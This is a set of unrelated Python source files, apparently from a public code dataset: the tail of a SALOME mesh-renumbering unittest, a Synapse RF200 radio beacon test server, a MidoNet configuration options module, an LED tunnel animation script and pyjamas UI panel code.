nbcell2dmetis=m.getNumberOfElements(MED_CELL,MED_ALL_ELEMENTS)
connectivite=[12,14,10,4,2,6,13,11,11,13,14,12,16,8,3,9,5,1,7,15,15,7,8,16,14,16,9,10,6,5,15,13,13,15,16,14]
connectivite_index=[1,5,9,13,17,21,25,29,33,37]
conn=m.getConnectivity(MED_NODAL,MED_CELL,MED_QUAD4)
conn_index=m.getConnectivityIndex(MED_NODAL,MED_CELL);
conn2dmetis=(list(conn)==connectivite)
conn_index2dmetis=(list(conn_index)==connectivite_index)
Metis2D=conn2dmetis and conn_index2dmetis and (nbcell2dmetis==9)
self.assertTrue(Metis2D)
os.remove(self.dir_mesh+"/out_"+filename)
pass
def testBoost2DPolygon(self):
filename="Test2Dpoly.med"
meshname="Mesh_1"
method="BOOST"
string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
os.system(string_to_execute)
mm=MEDFileMesh.New(self.dir_mesh+"/out_"+filename,meshname)
m=mm.getMeshAtLevel(0)
nbcell2dpolyboost=m.getNumberOfCells()
connectivite=[5,1,4,8,9,5,10,9,8,11,5,4,5,7,8,5,3,10,11,15,5,11,8,7,12,5,5,0,6,7,5,15,11,12,14,5,12,7,6,13,5,14,12,13,2]
connectivite_index=[0,5,10,15,20,25,30,35,40,45]
conn=m.getNodalConnectivity().getValues()
conn_index=m.getNodalConnectivityIndex().getValues()
conn2dpolyboost=(list(conn)==connectivite)
conn_index2dpolyboost=(list(conn_index)==connectivite_index)
PolyBoost2D=conn2dpolyboost and conn_index2dpolyboost and (nbcell2dpolyboost==9)
self.assertTrue(PolyBoost2D)
os.remove(self.dir_mesh+"/out_"+filename)
pass
def tessMetis2DPolygon(self):#not activated yet
filename="Test2Dpoly.med"
meshname="Mesh_1"
method="METIS"
string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
os.system(string_to_execute)
m = MESH(MED_DRIVER,self.dir_mesh+"/out_"+filename,meshname)
nbcell2dpolymetis=m.getNumberOfElements(MED_CELL,MED_ALL_ELEMENTS)
connectivite=[6,1,7,8,2,5,9,10,5,6,8,9,15,13,14,3,4,11,12,16,16,12,13,15,11,10,9,12,12,9,8,13,13,8,7,14]
connectivite_index=[1,5,9,13,17,21,25,29,33,37]
conn=m.getConnectivity(MED_NODAL,MED_CELL,MED_POLYGON)
conn_index=m.getConnectivityIndex(MED_NODAL,MED_CELL)
conn2dpolymetis=(list(conn)==connectivite)
conn_index2dpolymetis=(list(conn_index)==connectivite_index)
PolyMetis2D=conn2dpolymetis and conn_index2dpolymetis and (nbcell2dpolymetis==9)
self.assertTrue(PolyMetis2D)
os.remove(self.dir_mesh+"/out_"+filename)
pass
def testBoost3D(self):
filename="Test3D.med"
meshname="Mesh_1"
method="BOOST"
string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
os.system(string_to_execute)
mm=MEDFileMesh.New(self.dir_mesh+"/out_"+filename,meshname)
m=mm.getMeshAtLevel(0)
nbcell3dboost=m.getNumberOfCells()
connectivite=[18,22,12,4,17,26,21,13,25,18,16,5,12,22,24,15,21,26,18,26,21,13,25,23,14,6,19,18,8,22,17,0,20,26,25,9,18,24,15,21,26,18,7,14,23,18,1,16,22,8,11,24,26,20,18,20,26,25,9,10,23,19,2,18,11,24,26,20,3,18,23,10]
connectivite_index=[0,9,18,27,36,45,54,63,72]
conn=m.getNodalConnectivity().getValues()
conn_index=m.getNodalConnectivityIndex().getValues()
conn3dboost=(list(conn)==connectivite)
conn_index3dboost=(list(conn_index)==connectivite_index)
Boost3D=conn3dboost and conn_index3dboost and (nbcell3dboost==8)
self.assertTrue(Boost3D)
os.remove(self.dir_mesh+"/out_"+filename)
pass
def tessMetis3D(self):#not activated yet
filename="Test3D.med"
meshname="Mesh_1"
method="METIS"
string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
os.system(string_to_execute)
m = MESH(MED_DRIVER,self.dir_mesh+"/out_"+filename,meshname)
nbcell3dmetis=m.getNumberOfElements(MED_CELL,MED_ALL_ELEMENTS)
connectivite=[12,25,27,21,4,19,24,11,27,22,14,26,24,15,7,20,17,6,13,23,25,16,22,27,9,23,18,1,21,27,26,10,23,13,5,18,27,22,14,26,25,16,22,27,19,8,15,24,2,17,23,9,12,25,27,21,21,27,26,10,11,24,20,3]
connectivite_index=[1,9,17,25,33,41,49,57,65]
conn=m.getConnectivity(MED_NODAL,MED_CELL,MED_HEXA8)
conn_index=m.getConnectivityIndex(MED_NODAL,MED_CELL);
conn3dmetis=(list(conn)==connectivite)
conn_index3dmetis=(list(conn_index)==connectivite_index)
Metis3D=conn3dmetis&conn_index3dmetis&(nbcell3dmetis==8)
self.assertTrue(Metis3D)
os.remove(self.dir_mesh+"/out_"+filename)
pass
def testBoost3DPoly(self):
filename="Test3Dpoly.med"
meshname="Mesh_1"
method="BOOST"
string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
os.system(string_to_execute)
mm=MEDFileMesh.New(self.dir_mesh+"/out_"+filename,meshname)
m=mm.getMeshAtLevel(0)
nbcell3dpolyboost=m.getNumberOfCells()
connectivite=[31,22,12,4,17,-1,26,25,13,21,-1,22,26,21,12,-1,12,21,13,4,-1,4,13,25,17,-1,17,25,26,22,31,16,5,12,22,-1,24,26,21,15,-1,16,24,15,5,-1,5,15,21,12,-1,12,21,26,22,-1,22,26,24,16,31,26,21,13,25,-1,23,19,6,14,-1,26,23,14,21,-1,21,14,6,13,-1,13,6,19,25,-1,25,19,23,26,31,8,22,17,0,-1,20,9,25,26,-1,8,20,26,22,-1,22,26,25,17,-1,17,25,9,0,-1,0,9,20,8,31,24,15,21,26,-1,18,23,14,7,-1,24,18,7,15,-1,15,7,14,21,-1,21,14,23,26,-1,26,23,18,24,31,1,16,22,8,-1,11,20,26,24,-1,1,11,24,16,-1,16,24,26,22,-1,22,26,20,8,-1,8,20,11,1,31,20,26,25,9,-1,10,2,19,23,-1,20,10,23,26,-1,26,23,19,25,-1,25,19,2,9,-1,9,2,10,20,31,11,24,26,20,-1,3,10,23,18,-1,11,3,18,24,-1,24,18,23,26,-1,26,23,10,20,-1,20,10,3,11]
connectivite_index=[0,30,60,90,120,150,180,210,240]
conn=m.getNodalConnectivity().getValues()
conn_index=m.getNodalConnectivityIndex().getValues()
conn3dpolyboost=(connectivite==list(conn))
conn_index3dpolyboost=(connectivite_index==list(conn_index))
PolyBoost3D=(conn3dpolyboost and conn_index3dpolyboost and (nbcell3dpolyboost==8))
self.assertTrue(PolyBoost3D)
os.remove(self.dir_mesh+"/out_"+filename)
pass
def tessBoost3DPoly(self):#not activated yet
filename="Test3Dpoly.med"
meshname="Mesh_1"
method="METIS"
string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
os.system(string_to_execute)
m = MESH(MED_DRIVER,self.dir_mesh+"/out_"+filename,meshname)
nbcell3dpolymetis=m.getNumberOfElements(MED_CELL,MED_ALL_ELEMENTS)
connectivite=[12,25,27,21,-1,4,11,24,19,-1,12,4,19,25,-1,25,19,24,27,-1,27,24,11,21,-1,21,11,4,12,
27,22,14,26,-1,24,20,7,15,-1,27,24,15,22,-1,22,15,7,14,-1,14,7,20,26,-1,26,20,24,27,
17,6,13,23,-1,25,27,22,16,-1,17,25,16,6,-1,6,16,22,13,-1,13,22,27,23,-1,23,27,25,17,
9,23,18,1,-1,21,10,26,27,-1,9,21,27,23,-1,23,27,26,18,-1,18,26,10,1,-1,1,10,21,9,
23,13,5,18,-1,27,26,14,22,-1,23,27,22,13,-1,13,22,14,5,-1,5,14,26,18,-1,18,26,27,23,
25,16,22,27,-1,19,24,15,8,-1,25,19,8,16,-1,16,8,15,22,-1,22,15,24,27,-1,27,24,19,25,
2,17,23,9,-1,12,21,27,25,-1,2,12,25,17,-1,17,25,27,23,-1,23,27,21,9,-1,9,21,12,2,
21,27,26,10,-1,11,3,20,24,-1,21,11,24,27,-1,27,24,20,26,-1,26,20,3,10,-1,10,3,11,21]
connectivite_index=[1, 30, 59, 88, 117, 146, 175, 204, 233]
conn=m.getConnectivity(MED_NODAL,MED_CELL,MED_POLYHEDRA)
conn_index=m.getConnectivityIndex(MED_NODAL,MED_CELL);
conn3dpolymetis=(list(conn)==connectivite)
conn_index3dpolymetis=(list(conn_index)==connectivite_index)
PolyMetis3D=(conn3dpolymetis and conn_index3dpolymetis and (nbcell3dpolymetis==8))
self.assertTrue(PolyMetis3D)
os.remove(self.dir_mesh+"/out_"+filename)
pass
def setUp(self):
srcdir = os.getenv("srcdir")
med_root = os.getenv("MED_ROOT_DIR")
if srcdir:
# make test is being performed
self.dir_renumber="./renumber"
self.dir_mesh = os.path.join( srcdir, "../../resources")
elif med_root:
# hope renumber has been already installed
self.dir_renumber=os.path.join( med_root, "bin/salome/renumber")
self.dir_mesh = os.path.join( med_root, "share/salome/resources/med")
else:
# initial version
self.dir_renumber="../../../MED_INSTALL/bin/salome/renumber"
self.dir_mesh="../../resources"
pass
pass
pass
unittest.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
"""
This script contains the beacon server.
This script should be programmed to the RF200 of the whisper box.
@author: albert
"""
from atmega128rfa1_math import *
from atmega128rfa1_temperature import *
from synapse.RF200 import *
ATT_SERIAL = 1
ATT_DOUBLE_SERIAL = 2 # TBD not yet supported
ATT_PARALLEL = 3
g_send_period = 14 # 14ms is the default
g_att = 0 # attenuation currently set (0..31)
g_test_att = 0 # attenuation to be used for test packet (0..31)
g_test_tx_pwr = 17 # tx power to be used for test packets (0..17)
g_send_delay = 1 # ms
g_send_delay_default = 100
g_send_packets_remaining = 0
g_target_node = None
g_receive_count = 0
g_receive_count_old = 0
g_receive_target_count = 0
g_not_received_time = 0
g_receive_timeout = 600
g_lq_sum = None
g_last_ping_time = 0
g_multi_att_min = 0
g_multi_att_max = 0
g_packets_per_test = 100
g_post_send_delay = 0
g_send_me_time = None
g_receive_me_time = None
g_send_receive_results_time = None
g_att_type = None # attenuator type
PIN_C0_5 = GPIO_16
PIN_C1 = GPIO_15
PIN_C2 = GPIO_14
PIN_C4 = GPIO_13
PIN_C8 = GPIO_18
PIN_C16 = GPIO_17
PIN_LE = GPIO_12
PIN_CLK = PIN_C8
PIN_DATA = PIN_C16
def set_att_type(att_type):
global g_att_type
g_att_type = att_type
def beacon_server_init():
set_att(0)
def request_send_me():
global g_target_node
global g_packets_per_test
global g_send_delay
global g_send_period
global g_test_tx_pwr
global g_send_me_time
global g_receive_count
g_receive_count = -3
set_att(0)
txPwr(17)
mcastRpc(
1,
1,
'send_me',
g_target_node,
g_packets_per_test,
g_send_delay,
g_send_period,
g_test_tx_pwr)
g_send_me_time = getMs()
def request_receive_results():
global g_send_receive_results_time
global g_target_node
global g_receive_count
g_receive_count = -2
set_att(0)
txPwr(17)
mcastRpc(1, 1, 'send_receive_results', g_target_node)
g_send_receive_results_time = getMs()
def request_receive_me():
global g_receive_me_time
global g_target_node
global g_packets_per_test
global g_receive_count
g_receive_count = -1
set_att(0)
txPwr(17)
mcastRpc(1, 1, 'receive_me', g_target_node, g_packets_per_test)
g_receive_me_time = getMs()
# @setHook(HOOK_1S)
# def do_every_1s(tick):
# mcastRpc(1, 1, 'beep')
def beacon_server_tick(tick):
global g_send_packets_remaining
global g_pong_seq
global g_send_delay
global g_send_period
global g_not_received_time
global g_receive_target_count
global g_receive_count
global g_receive_count_old
global g_multi_att_min
global g_multi_att_max
global g_receive_timeout
global g_target_node
global g_post_send_delay
global g_test_tx_pwr
global g_last_ping_time
global g_send_me_time
global g_receive_me_time
global g_send_receive_results_time
if g_send_delay > 0:
g_send_delay -= 1
if g_send_delay == 0:
set_att(g_test_att)
# at the end of the delay cycle setup the transmit power
txPwr(g_test_tx_pwr)
return
if g_send_packets_remaining > 0:
if (tick - g_last_ping_time) >= g_send_period:
g_last_ping_time = tick
mcastRpc(1, 1, 'ping')
g_send_packets_remaining -= 1
if g_send_packets_remaining == 0:
g_post_send_delay = g_send_delay_default
if g_post_send_delay > 0:
g_post_send_delay -= 1
if g_post_send_delay == 0:
request_receive_results()
if g_receive_target_count > 0:
if g_receive_count > g_receive_count_old:
g_not_received_time = 0
g_receive_count_old = g_receive_count
if g_receive_count >= g_receive_target_count:
# all the packets arrived
# print 'cnt:', g_receive_count, '/', g_receive_target_count, ' lq:', get_lq_sum()
#mcastRpc(1, 1, 'receive_count', g_receive_count)
if g_multi_att_min < g_multi_att_max:
g_multi_att_min = 1 + (
(g_multi_att_min + g_multi_att_max) / 2)
# print "multitest ", g_multi_att_min, ' ', g_multi_att_max
if g_multi_att_min < g_multi_att_max:
tx_test(
g_target_node,
(g_multi_att_min + g_multi_att_max) / 2,
g_test_tx_pwr)
g_receive_target_count = 0
else:
g_not_received_time += 1
if g_not_received_time >= g_receive_timeout:
# timeout happened
# print 'timeout ', g_receive_count
# 'cnt:', g_receive_count, '/', g_receive_target_count, ' lq:', get_lq_sum()
#mcastRpc(1, 1, 'receive_count', g_receive_count)
if g_multi_att_min < g_multi_att_max:
if g_receive_count > (g_receive_target_count / 2):
g_multi_att_min = 1 + (
(g_multi_att_min + g_multi_att_max) / 2)
else:
g_multi_att_max = (
g_multi_att_min + g_multi_att_max) / 2
# print "multitest ", g_multi_att_min, ' ', g_multi_att_max
if g_multi_att_min < g_multi_att_max:
tx_test(
g_target_node,
(g_multi_att_min + g_multi_att_max) / 2,
g_test_tx_pwr)
g_receive_target_count = 0
if g_send_me_time is not None:
if (tick - g_send_me_time) > 200:
request_send_me()
if g_receive_me_time is not None:
if (tick - g_receive_me_time) > 200:
request_receive_me()
if g_send_receive_results_time is not None:
if (tick - g_send_receive_results_time) > 200:
request_receive_results()
def set_att(att):
global g_att
g_att = att
if g_att_type == ATT_SERIAL:
# serial
setPinDir(PIN_CLK, True)
setPinDir(PIN_DATA, True)
setPinDir(PIN_LE, True)
writePin(PIN_CLK, False)
writePin(PIN_DATA, False)
writePin(PIN_LE, False)
writePin(PIN_DATA, att & 32)
writePin(PIN_CLK, True)
writePin(PIN_CLK, False)
writePin(PIN_DATA, att & 16)
writePin(PIN_CLK, True)
writePin(PIN_CLK, False)
writePin(PIN_DATA, att & 8)
writePin(PIN_CLK, True)
writePin(PIN_CLK, False)
writePin(PIN_DATA, att & 4)
writePin(PIN_CLK, True)
writePin(PIN_CLK, False)
writePin(PIN_DATA, att & 2)
writePin(PIN_CLK, True)
writePin(PIN_CLK, False)
writePin(PIN_DATA, att & 1)
writePin(PIN_CLK, True)
writePin(PIN_CLK, False)
writePin(PIN_LE, True)
writePin(PIN_LE, False)
return
elif g_att_type == ATT_PARALLEL:
# parallel
setPinDir(PIN_C0_5, True)
writePin(PIN_C0_5, att & 1)
setPinDir(PIN_C1, True)
writePin(PIN_C1, att & 2)
setPinDir(PIN_C2, True)
writePin(PIN_C2, att & 4)
setPinDir(PIN_C4, True)
writePin(PIN_C4, att & 8)
setPinDir(PIN_C8, True)
writePin(PIN_C8, att & 16)
setPinDir(PIN_C16, True)
writePin(PIN_C16, att & 32)
setPinDir(PIN_LE, True)
writePin(PIN_LE, False)
writePin(PIN_LE, True)
def get_att():
global g_att
return g_att
def set_packets_per_test(packets_per_test):
global g_packets_per_test
g_packets_per_test = packets_per_test
def get_packets_per_test():
global g_packets_per_test
return g_packets_per_test
def send_me(
target_node,
packets_to_send,
send_delay,
send_period,
test_tx_pwr):
if target_node == localAddr():
send_start(
rpcSourceAddr(),
packets_to_send,
send_delay,
send_period,
test_tx_pwr)
def send_start(
target_node,
packets_to_send,
send_delay,
send_period,
test_tx_pwr):
global g_pong_seq
global g_target_node
global g_send_packets_remaining
global g_send_delay
global g_send_period
global g_test_tx_pwr
g_target_node = target_node
g_send_delay = send_delay
g_send_period = send_period
g_send_packets_remaining = packets_to_send
g_test_tx_pwr = test_tx_pwr
txPwr(17)
mcastRpc(1, 1, 'send_started', packets_to_send)
def send_started(receive_target_count):
global g_target_node
global g_test_att
global g_send_me_time
if rpcSourceAddr() == g_target_node:
g_send_me_time = None
set_att(g_test_att)
receive_start(g_target_node, receive_target_count)
def receive_me(target_node, receive_target_count):
if target_node == localAddr():
receive_start(rpcSourceAddr(), receive_target_count)
def receive_start(target_node, receive_target_count):
global g_target_node
global g_receive_count
global g_receive_count_old
global g_receive_target_count
global g_lq_sum
global g_not_received_time
g_target_node = target_node
g_receive_count = 0
g_receive_count_old = 0
g_not_received_time = 0
g_receive_target_count = receive_target_count
g_lq_sum = itos(0)
#def ping(target_node, seq):
# """if pinged pong out the link quality"""
# if target_node == localAddr():
# mcastRpc(1, 1, 'pong', getLq(), seq)
def ping():
"""receive this test packet if sent by target node"""
global g_target_node
global g_receive_count
global g_lq_sum
if rpcSourceAddr() == g_target_node:
g_receive_count += 1
g_lq_sum = add_32(g_lq_sum, itos(getLq()))
def tx_test(target_node, test_att, test_tx_pwr, packets_per_test, send_period, send_delay):
"""
tx test ends when expected number of received packets arrived
or timeout even happened
timeout is when no packets have received for
at least the duration of the timeout's length
default timeout is 100ms
"""
global g_test_att
global g_test_tx_pwr
global g_target_node
global g_receive_count
global g_lq_sum
global g_send_period
global g_packets_per_test
global g_send_delay_default
global g_receive_target_count
# print 'txtest att:', test_att, ' pwr:', test_tx_pwr
g_receive_target_count = 0
g_receive_count = 0
g_lq_sum = itos(0)
g_target_node = target_node
g_test_att = test_att
g_test_tx_pwr = test_tx_pwr
g_packets_per_test = packets_per_test
g_send_period = send_period
g_send_delay_default = send_delay
receive_start(target_node, g_packets_per_test)
request_send_me()
def rx_test(target_node, test_att, test_tx_pwr, packets_per_test, send_period, send_delay):
global g_target_node
global g_test_att
global g_test_tx_pwr
global g_receive_count
global g_lq_sum
global g_packets_per_test
global g_send_period
global g_send_delay_default
global g_receive_me_time
global g_receive_target_count
# print 'rxtest att:', test_att, ' pwr', test_tx_pwr
g_receive_target_count = 0
g_target_node = target_node
g_test_att = test_att
g_test_tx_pwr = test_tx_pwr
g_lq_sum = itos(0)
g_packets_per_test = packets_per_test
g_send_period = send_period
g_send_delay_default = send_delay
request_receive_me()
def receive_started(packets_to_send):
global g_send_delay
global g_send_packets_remaining
global g_test_att
global g_test_tx_pwr
global g_receive_me_time
if g_target_node == rpcSourceAddr():
# print 'receive_started'
g_receive_me_time = None
set_att(g_test_att)
txPwr(g_test_tx_pwr)
g_send_delay = g_send_delay_default
g_send_packets_remaining = packets_to_send
def tx_multi_test(target_node, tx_pwr):
global g_multi_att_min
global g_multi_att_max
set_att(0)
g_multi_att_min = 0
g_multi_att_max = 63
tx_test(target_node, (g_multi_att_min + g_multi_att_max) / 2, tx_pwr)
def receive_results(receive_count, lq_sum):
global g_receive_count
global g_lq_sum
global g_send_receive_results_time
global g_target_node
if g_target_node == rpcSourceAddr():
g_send_receive_results_time = None
g_receive_count = receive_count
g_lq_sum = lq_sum
# print 'cnt:', receive_count, ' lq:', lq_sum
def send_receive_results(target_node):
global g_receive_count
global g_lq_sum
if target_node == localAddr():
mcastRpc(1, 1, 'receive_results', g_receive_count, g_lq_sum)
def get_receive_count():
global g_receive_count
return g_receive_count
def get_lq_sum():
global g_lq_sum
global g_receive_count
return stoi(
div_32(
mult_32(
g_lq_sum,
itos(100)
),
itos(g_receive_count)
)
)
|
unknown
|
codeparrot/codeparrot-clean
| ||
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012 Midokura Japan K.K.
# Copyright (C) 2013 Midokura PTE LTD
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Tomoe Sugihara, Midokura Japan KK
from oslo.config import cfg
midonet_opts = [
cfg.StrOpt('midonet_uri', default='http://localhost:8080/midonet-api',
help=_('MidoNet API server URI.')),
cfg.StrOpt('username', default='admin',
help=_('MidoNet admin username.')),
cfg.StrOpt('password', default='passw0rd',
secret=True,
help=_('MidoNet admin password.')),
cfg.StrOpt('project_id',
default='77777777-7777-7777-7777-777777777777',
help=_('ID of the project that MidoNet admin user'
'belongs to.')),
cfg.StrOpt('provider_router_id',
default=None,
help=_('Virtual provider router ID.')),
cfg.StrOpt('metadata_router_id',
default=None,
help=_('Virtual metadata router ID.')),
cfg.StrOpt('mode',
default='dev',
help=_('Operational mode. Internal dev use only.'))
]
cfg.CONF.register_opts(midonet_opts, "MIDONET")
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python3
"""Stars lights up random LEDs
Try running with optional config name.
ex. ./stars.py blackberry
"""
__author__ = 'plong0 <plong00@gmail.com>'
import sys
import time
import random
from pprint import pprint
from LED_Tunnel import Tunnel
# fun settings - try adding your own config and playing with the options
configs = {
'basic': {
'launchDelay': 0.1,
'launchCount': 1,
'maximum': int(Tunnel.LED_COUNT*2.0/3.0),
'fadeIn': [0.2, 0.3],
'lifespan': [1.0, 5.0],
'fadeOut': [0.25, 0.5],
'colours': [
(255, 255, 0), # yellow
(255, 192, 0), # orange
(255, 255, 255) # white
]
},
'blackberry': {
'launchDelay': 0.0,
'launchCount': 1,
'maximum': int(Tunnel.LED_COUNT*0.75),
'fadeIn': [0.2, 0.3],
'lifespan': [1.0, 5.0],
'fadeOut': [0.25, 0.5],
'colours': [
(192, 0, 255), # purple
(255, 128, 255), # light purple
(255, 192, 255) # white
]
},
'rainbow-sky': {
'launchDelay': 0.0,
'launchCount': 5,
'maximum': int(Tunnel.LED_COUNT),
'fadeIn': [0.5, 1.0],
'lifespan': [5.0, 10.0],
'fadeOut': [0.75, 1.5],
'colours': [
(128, 0, 0), # dark red
(255, 0, 0), # red
(255, 165, 0), # orange
(255, 192, 0), # orange
(255, 255, 0), # yellow
(0, 128, 0), # green
(0, 255, 0), # green
(0, 0, 128), # blue
(0, 0, 255), # blue
(192, 0, 192), # purple
(192, 0, 255), # purple
(255, 255, 255), # white
]
}
};
config_name = next(iter(configs))
if len(sys.argv) > 1:
config_name = sys.argv[1]
if (config_name not in configs):
sys.exit('Invalid config name: "{}"'.format(config_name))
config = configs[config_name]
# system settings
inverse = True # if True, start at the back of the tunnel
frameDelay = 0.01 # delay between frames - controls animation speed (increase to slow down)
print('RUNNING CONFIG: "{}"'.format(config_name))
pprint(config)
activeStars = {}
lastLaunch = None
def should_launch():
global activeStars, lastLaunch
return len(activeStars) < config['maximum'] and (lastLaunch is None or time.time() - lastLaunch >= config['launchDelay'])
def do_launch():
global activeStars, lastLaunch
random.seed()
index = random.randint(0, Tunnel.LED_COUNT-1)
if index not in activeStars:
activeStars[index] = {
'state': 0,
'stateStart': time.time(),
'colourIndex': random.randint(0, len(config['colours'])-1),
'fadeIn': random.uniform(config['fadeIn'][0], config['fadeIn'][1]),
'lifespan': random.uniform(config['lifespan'][0], config['lifespan'][1]),
'fadeOut': random.uniform(config['fadeOut'][0], config['fadeOut'][1])
}
lastLaunch = time.time()
while True:
if should_launch():
for i in range(config['launchCount']):
do_launch()
pixels = [ (0,0,0) ] * Tunnel.LED_COUNT
killStars = []
for index in activeStars:
activeStar = activeStars[index]
stateTime = time.time() - activeStar['stateStart']
if activeStar['state'] == 0:
if activeStar['fadeIn']:
stateProg = stateTime / activeStar['fadeIn']
else:
stateProg = 1.0
colour1 = (0,0,0)
colour2 = config['colours'][activeStar['colourIndex']]
elif activeStar['state'] == 1:
if activeStar['lifespan']:
stateProg = stateTime / activeStar['lifespan']
else:
stateProg = 1.0
colour1 = config['colours'][activeStar['colourIndex']]
colour2 = config['colours'][activeStar['colourIndex']]
elif activeStar['state'] == 2:
if activeStar['fadeOut']:
stateProg = stateTime / activeStar['fadeOut']
else:
stateProg = 1.0
colour1 = config['colours'][activeStar['colourIndex']]
colour2 = (0,0,0)
if stateProg >= 1.0:
killStars.append(index)
if index not in killStars:
if stateProg >= 1.0:
activeStar['state'] += 1
activeStar['stateStart'] = time.time()
stateProg = 1.0
pixels[index] = ( colour1[0]+(colour2[0]-colour1[0])*stateProg, colour1[1]+(colour2[1]-colour1[1])*stateProg, colour1[2]+(colour2[2]-colour1[2])*stateProg )
# kill the expired stars
for index in killStars:
activeStars.pop(index, None)
Tunnel.Client.put_pixels(pixels)
time.sleep(frameDelay)
|
unknown
|
codeparrot/codeparrot-clean
| ||
import pyjd
from pyjamas.ui.RootPanel import RootPanel
from pyjamas.ui.HTML import HTML
from pyjamas.ui.Label import Label
from pyjamas.ui.Button import Button
from pyjamas.ui.HorizontalPanel import HorizontalPanel
from pyjamas.ui.AbsolutePanel import AbsolutePanel
from pyjamas.ui.ScrollPanel import ScrollPanel
from pyjamas.ui.Grid import Grid
from pyjamas.ui.SimplePanel import SimplePanel
from pyjamas.ui.FlexTable import FlexTable
from pyjamas.ui.Image import Image
from pyjamas.ui.DockPanel import DockPanel
from pyjamas.ui import HasHorizontalAlignment
from pyjamas.ui import HasVerticalAlignment
from pyjamas.ui import HasAlignment
from pyjamas import Window
#from pyjamas.HorizSplitPanel import HorizontalSplitPanel
from pyjamas.JSONService import JSONProxy
from Trees import Trees
from pyjamas.Timer import Timer
class CollapserPanel(SimplePanel):
def __init__(self, sink):
SimplePanel.__init__(self)
self.sink = sink
self.caption = HTML()
self.child = None
self.showing = False
self.dragging = False
self.dragStartX = 0
self.dragStartY = 0
self.panel = FlexTable()
self.collapse = Image("./images/cancel.png")
self.collapse.addClickListener(self)
dock = DockPanel()
dock.setSpacing(0)
dock.add(self.collapse, DockPanel.EAST)
dock.add(self.caption, DockPanel.WEST)
dock.setCellHorizontalAlignment(self.collapse, HasAlignment.ALIGN_RIGHT)
dock.setCellVerticalAlignment(self.collapse, HasAlignment.ALIGN_TOP)
dock.setCellHorizontalAlignment(self.caption, HasAlignment.ALIGN_LEFT)
dock.setCellWidth(self.caption, "100%")
dock.setWidth("100%")
dock.setHeight("100%")
self.panel.setWidget(0, 0, dock)
self.panel.setHeight("100%")
self.panel.setWidth("100%")
self.panel.setBorderWidth(0)
self.panel.setCellPadding(0)
self.panel.setCellSpacing(0)
self.panel.getCellFormatter().setHeight(1, 0, "100%")
self.panel.getCellFormatter().setWidth(1, 0, "100%")
self.panel.getCellFormatter().setAlignment(1, 0, HasHorizontalAlignment.ALIGN_LEFT, HasVerticalAlignment.ALIGN_TOP)
SimplePanel.setWidget(self, self.panel)
self.setStyleName("gwt-DialogBox")
self.caption.setStyleName("Caption")
self.collapse.setStyleName("Close")
dock.setStyleName("Header")
#self.caption.addMouseListener(self)
self.collapsed = False
self.collapsed_width = "15px"
self.uncollapsed_width = "100%"
def setInitialWidth(self, width):
self.uncollapsed_width = width
SimplePanel.setWidth(self, width)
self.sink.setCollapserWidth(self, width)
def setHeight(self, height):
SimplePanel.setHeight(self, height)
def onClick(self, sender):
if self.collapsed == False:
self.collapse.setUrl("./tree_closed.gif")
self.collapsed = True
self.caption.setVisible(False)
if self.child:
self.child.setVisible(False)
self.setWidth(self.collapsed_width)
self.sink.setCollapserWidth(self, self.collapsed_width)
else:
self.collapse.setUrl("./images/cancel.png")
self.collapsed = False
self.caption.setVisible(True)
if self.child:
self.child.setVisible(True)
self.setWidth(self.uncollapsed_width)
self.sink.setCollapserWidth(self, self.uncollapsed_width)
def setHTML(self, html):
self.caption.setHTML(html)
def setText(self, text):
self.caption.setText(text)
def remove(self, widget):
if self.child != widget:
return False
self.panel.remove(widget)
return True
def doAttachChildren(self):
SimplePanel.doAttachChildren(self)
self.caption.onAttach()
def doDetachChildren(self):
SimplePanel.doDetachChildren(self)
self.caption.onDetach()
def setWidget(self, widget):
if self.child is not None:
self.panel.remove(self.child)
if widget is not None:
self.panel.setWidget(1, 0, widget)
self.child = widget
def space_split(data):
res = []
idx = data.find(" ")
res.append(data[:idx])
res.append(data[idx+1:])
return res
class RightGrid(DockPanel):
def __init__(self, title):
DockPanel.__init__(self)
self.grid = FlexTable()
title = HTML(title)
self.add(title, DockPanel.NORTH)
self.setCellHorizontalAlignment(title,
HasHorizontalAlignment.ALIGN_LEFT)
self.add(self.grid, DockPanel.CENTER)
self.grid.setBorderWidth("0px")
self.grid.setCellSpacing("0px")
self.grid.setCellPadding("4px")
self.formatCell(0, 0)
self.grid.setHTML(0, 0, " ")
def clear_items(self):
self.index = 0
self.items = {}
def set_items(self, items):
self.items = items
self.index = 0
self.max_rows = 0
self.max_cols = 0
Timer(1, self)
def onTimer(self, timer):
count = 0
while count < 10 and self.index < len(self.items):
self._add_items(self.index)
self.index += 1
count += 1
if self.index < len(self.items):
timer.schedule(1)
def _add_items(self, i):
item = self.items[i]
command = item[0]
col = item[1]
row = item[2]
data = item[3]
format_row = -1
format_col = -1
if col+1 > self.max_cols:
format_col = self.max_cols
#self.grid.resizeColumns(col+1)
self.max_cols = col+1
if row+1 >= self.max_rows:
format_row = self.max_rows
#self.grid.resizeRows(row+1)
self.max_rows = row+1
if format_row >= 0:
for k in range(format_row, self.max_rows):
self.formatCell(k, 0)
self.formatCell(row, col)
cf = self.grid.getCellFormatter()
if command == 'data':
self.grid.setHTML(row, col, data)
elif command == 'cellstyle':
data = space_split(data)
attr = data[0]
val = data[1]
cf.setStyleAttr(row, col, attr, val)
